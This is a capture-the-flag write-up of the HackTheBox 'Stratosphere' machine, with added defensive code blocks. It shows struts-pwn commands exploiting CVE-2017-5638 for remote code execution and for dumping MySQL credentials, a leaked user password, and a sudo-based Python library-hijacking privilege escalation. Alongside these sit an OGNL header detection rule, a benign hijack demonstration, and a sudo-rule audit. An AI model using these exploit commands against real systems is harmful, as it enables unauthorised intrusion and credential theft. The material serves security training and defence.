Hi All, the Stratosphere machine retired on HackTheBox today, andddddddd YES! I will explain how I solved the Stratosphere box on HackTheBox. This was a medium difficulty box and one of the more interesting ones, with a nice privilege escalation technique.
Check out HackTheBox for upskilling your pentest game: https://www.hackthebox.eu/
Let's begin with a basic nmap scan.
root@kali:~# nmap -sC -sV 10.10.10.64 -T4
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-31 21:57 IST
Nmap scan report for 10.10.10.64
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (EdDSA)
80/tcp open http
From the nmap scan we have three ports open, of which ports 80 and 22 are notable. It is feasible to start our enumeration from the web port 80.
From the dirbuster bruteforce, we find a hidden site hosted at http://10.10.10.64/Monitoring/
After a quick enumeration it is found that the site is built using Apache Struts, and is vulnerable to the Struts flaw CVE-2017-5638.
A PoC can be found here: https://github.com/mazen160/struts-pwn
We can get code execution by running the PoC as follows.
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c 'cat /etc/passwd'
richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash
From the /etc/passwd file, we get a user named 'richard' active on the machine.
Similarly, it is found that the machine is running MySQL with the credentials 'admin'/'admin', taken from a file named db_connect. But since MySQL is not exposed to the public, we have to rely on our previously found RCE to execute SQL commands. This can be done as follows:
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c 'mysql -u admin -padmin users -e "show tables;"'
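For the defensive side of the Struts step above: CVE-2017-5638 is triggered when the Jakarta multipart parser evaluates an OGNL expression placed in the Content-Type request header. The following is an added example, not code from the write-up or from struts-pwn, of the check a reverse proxy or WAF rule would make before such a request reaches Struts. The header samples are constructed here and the suspicious one carries only a non-functional marker, not a payload.

```python
import re
from urllib.parse import unquote

# OGNL expression delimiters. CVE-2017-5638 (S2-045) fires when the Jakarta
# multipart parser evaluates an expression like this found in Content-Type.
OGNL_MARKER = re.compile(r"[%$]\{")


def ognl_in_headers(headers: dict) -> list:
    """Return the (lower-cased) names of request headers that carry an OGNL
    expression marker. Only Content-Type is inspected, since that is the
    CVE-2017-5638 vector; the value is also percent-decoded once so that an
    encoded '%{' is caught as well."""
    hits = []
    for name, value in headers.items():
        lname = name.lower()
        if lname != "content-type":
            continue
        if OGNL_MARKER.search(value) or OGNL_MARKER.search(unquote(value)):
            hits.append(lname)
    return hits


def classify(headers: dict) -> str:
    """Decision a proxy rule would take for the request: 'allow' or 'block'."""
    return "block" if ognl_in_headers(headers) else "allow"


# Constructed samples, not captured traffic.
BENIGN_UPLOAD = {
    "Host": "10.10.10.64",
    "Content-Type": "multipart/form-data; boundary=----ConstructedBoundary1234",
}
SUSPICIOUS_UPLOAD = {
    "Host": "10.10.10.64",
    # Inert marker only: the expression body does nothing, it just has the shape
    # a detection rule must recognise.
    "Content-Type": "%{(#constructed='marker')}multipart/form-data",
}

if __name__ == "__main__":
    for label, hdrs in (("benign", BENIGN_UPLOAD), ("suspicious", SUSPICIOUS_UPLOAD)):
        print(label, "->", classify(hdrs), ognl_in_headers(hdrs))
```

The rule is deliberately narrow (one header, one delimiter pattern) so it can sit in front of a Struts instance without false positives on ordinary multipart uploads; patching Struts is the actual fix, and this check is a stopgap for the window before that happens.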
From dumping the tables, we find a table named 'accounts'.
Further dumping data from the accounts table reveals credentials:
python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c 'mysql -u admin -padmin users -e "select * from accounts;"'
fullName password username
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
These credentials can be used to connect through SSH on port 22. This gives us the user flag.
Desktop hashlib.py __pycache__ test.py user.txt
By quick enumeration, it is found that richard can execute a few commands as root:
richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
And also, a quick look at the source code of test.py reveals that it imports the hashlib library.
We can use a classic Python privilege escalation technique, library hijacking, which exploits how Python searches for imported modules.
Since we have write permission to the directory containing the privileged Python script, we can create a file named 'hashlib.py' with our own code. Python puts the script's own directory at the front of its module search path, so it loads our file instead of the standard library's hashlib.
Create a file named 'hashlib.py' in the same directory as 'test.py' with the following content to display the contents of the root.txt file and spawn a root shell (more on this privesc technique: https://rastating.github.io/privilege-escalation-via-python-library-hijacking/).
Now let's execute the following command to gain ROOT!
richard@stratosphere:~$ sudo /usr/bin/python3 /home/richard/test.py
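To see exactly why the hijack works, and what stops it, here is an added example that is not part of the write-up. It builds a throwaway directory containing a stand-in test.py that imports hashlib plus a benign shadow hashlib.py that only sets a marker attribute, runs test.py from a different working directory, and reports which hashlib was loaded. Run normally, the script directory is sys.path[0] and the shadow wins; run with the interpreter's -I (isolated mode), which drops the script directory from sys.path, the standard library is loaded instead. A second helper, risky_sudo_rules, is a hypothetical audit that parses sudo -l output like the one above and flags interpreter-plus-script rules whose script directory the user can write to; its writability test is injectable so it can be checked deterministically.

```python
import os
import subprocess
import sys
import tempfile
import textwrap

# Constructed stand-in for the privileged script: like the box's test.py it
# imports hashlib. It prints a marker so the caller can tell which one loaded.
TARGET_SCRIPT = textwrap.dedent("""\
    import hashlib
    print(getattr(hashlib, "HIJACK_MARKER", "stdlib hashlib"))
""")

# Constructed, deliberately harmless shadow module (sets one attribute).
SHADOW_MODULE = 'HIJACK_MARKER = "shadow hashlib.py from the script directory"\n'


def run_script_with_shadow(isolated: bool) -> str:
    """Write test.py and a shadow hashlib.py into one directory, run test.py
    from a different cwd, and return what it printed. isolated=True adds -I,
    which removes the script directory (and env overrides) from sys.path."""
    with tempfile.TemporaryDirectory() as workdir:
        script = os.path.join(workdir, "test.py")
        with open(script, "w") as fh:
            fh.write(TARGET_SCRIPT)
        with open(os.path.join(workdir, "hashlib.py"), "w") as fh:
            fh.write(SHADOW_MODULE)
        cmd = [sys.executable] + (["-I"] if isolated else []) + [script]
        # cwd is deliberately "/" and not workdir: it is the script's directory,
        # not the caller's cwd, that Python prepends to sys.path.
        result = subprocess.run(cmd, capture_output=True, text=True, cwd="/", check=True)
        return result.stdout.strip()


def hijack_succeeds(isolated: bool) -> bool:
    """True when the shadow module was imported instead of the standard library."""
    return "shadow" in run_script_with_shadow(isolated)


def risky_sudo_rules(sudo_l_output: str, is_writable=lambda d: os.access(d, os.W_OK)) -> list:
    """Hypothetical audit: return script paths from `sudo -l` rules of the form
    '(runas) [TAGS:] /path/to/python* /path/to/script.py' whose directory the
    current user can write to. Rule lines are the ones starting with '('."""
    findings = []
    for line in sudo_l_output.splitlines():
        tokens = line.split()
        if not tokens or not tokens[0].startswith("("):
            continue
        paths = [t for t in tokens if t.startswith("/")]
        if not paths or not os.path.basename(paths[0]).startswith("python"):
            continue
        for script in paths[1:]:
            if script.endswith(".py") and is_writable(os.path.dirname(script)):
                findings.append(script)
    return findings


# The sudo -l output shown in the write-up, reused here as audit input.
SUDO_L_OUTPUT = textwrap.dedent("""\
    Matching Defaults entries for richard on stratosphere:
    User richard may run the following commands on stratosphere:
        (ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
""")

if __name__ == "__main__":
    print("normal run, shadow loaded:", hijack_succeeds(False))
    print("python -I run, shadow loaded:", hijack_succeeds(True))
    print("risky sudo rules:", risky_sudo_rules(SUDO_L_OUTPUT))
```

The mitigation the demo points at is twofold: the sudo rule should invoke the interpreter with -I (or the script should live in a root-owned directory, with its __pycache__ not writable by the user), and the wildcard /usr/bin/python* should be replaced by one explicit interpreter path so the user cannot pick a different binary.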
Thank you. Stay tuned for the next write-up!